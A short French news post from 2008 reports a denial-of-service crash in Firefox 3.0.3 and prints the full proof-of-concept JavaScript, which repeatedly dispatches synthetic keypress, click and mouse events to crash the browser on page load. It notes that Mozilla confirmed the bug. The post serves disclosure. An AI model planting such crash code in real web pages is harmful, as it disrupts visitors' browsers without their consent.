Plantage sévère de Firefox 3.0.3
Nous avions beaucoup tapé sur Chome suite aux nombreux tests effectués dès sa sortie. Ces manipulations avaient permis de déceler des vulnérabilités et autres instabilités du navigateur. Mais il est également possible de mettre en avant des instabilités dans Firefox qui est pourtant bien plus âgé, même dans la dernière version (ie. 3.0.3) via quelques lignes de JavaScript. Il s’agit là d’une attaque dite de déni de service (DOS).
<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");
moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
moz303.initUIEvent("onkeydown", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
moz303.initUIEvent("onkeyup", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
moz303.initUIEvent("onmousedown", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
moz303.initUIEvent("onmouseup", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}
</script>
L’exécution de la page contenant ce code se traduit par un plantage pur et simple. Cette vulnérabilité a été confirmée par la fondation Mozilla et devrait donc être corrigée dans la prochaine mouture du navigateur.
30/09/2008 à 11:28 
